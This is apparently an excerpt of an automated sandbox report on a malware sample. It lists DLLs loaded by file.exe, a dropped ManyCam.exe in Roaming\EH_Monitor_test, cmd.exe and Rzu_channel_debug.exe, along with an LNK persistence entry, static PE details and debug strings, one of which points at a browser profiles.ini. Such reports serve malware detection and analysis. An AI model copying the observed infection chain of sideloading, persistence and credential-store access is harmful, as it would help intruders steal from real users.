Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippopencv097.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcv20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippi20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ipps20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippvm20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc-5.1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: ippcc20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_p3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: mkl_def.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: pcaui.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\pcaui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: thiphljqfhe.5.dr

LNK file: ..\..\Roaming\EH_Monitor_test\ManyCam.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 5963808 > 1048576

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb0 source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000001.00000002.1718656549.0000000010062000.00000002.00000001.01000000.0000000A.sdmp, ManyCam.exe, 00000001.00000003.1706834191.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773874911.0000000010062000.00000002.00000001.01000000.00000012.sdmp, ManyCam.exe, 0000000C.00000002.2155971441.0000000010062000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatinerp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: ntdll.pdb source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.00020000.
Source:	Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
